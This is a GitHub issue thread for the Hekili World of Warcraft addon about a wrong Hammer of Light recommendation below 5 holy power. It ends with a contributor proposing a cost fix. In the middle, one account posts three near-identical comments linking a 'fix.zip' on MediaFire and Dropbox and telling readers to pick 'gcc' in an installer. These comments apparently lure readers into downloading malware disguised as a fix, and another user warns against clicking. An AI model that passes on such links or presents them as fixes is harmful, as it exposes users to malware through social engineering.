### ISSUE TITLE
[REC] Hammer of Light still recommended below 5 holy power after 08-25-24 update.

### ISSUE THREAD

**Issue by EXUnForgiv3n** [Hekili/hekili#3547]
### Before You Begin

- [X] I confirm that I have downloaded the latest version of the addon.
- [X] I am not playing on a private server.
- [X] I checked for an [existing, open ticket](https://github.com/Hekili/hekili/labels/recommendation) for this issue and was not able to find one.
- [X] I edited the title of this issue (above) so that it describes the issue I am reporting.
- [X] I am reporting an issue with the default priority included with the specialization (imported or edited priorities are not supported).

### Describe the Issue

Hammer of Light is still being recommended below 5 holy power. This has been after the update today.

### How to Reproduce

1. Enter game as a ret paladin with Templar hero talents.
2. Use wake of Ashes with 1 or less holy power.
3. You will see Hammer of Light being the next ability recommended.

### Snapshot (Link)

https://pastebin.com/Ji9V71t2

### Additional Information

I am not too savy when it comes to reading the snapshots, but step 33 in the snapshot shows this having Hammer of Light recommended at 3 holy power. I don't know if this is the trigger for the false recommendation or not. 

https://cdn.discordapp.com/attachments/443207479694852107/1277416951316217908/image.png?ex=66cd16be&is=66cbc53e&hm=021377247304401c1a470b3b10d98627807b6b05be371fe439e321d6d5fc9009&

### Contact Information

EXUnForgiv3n

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by dglynch** [comment]
The above comment looks dangerous and I recommend nobody click on the link.

**Comment by syrifgit** [comment]
I will submit a PR to change the holy power cost from 3 to 5

Edit: https://github.com/Hekili/hekili/pull/3548
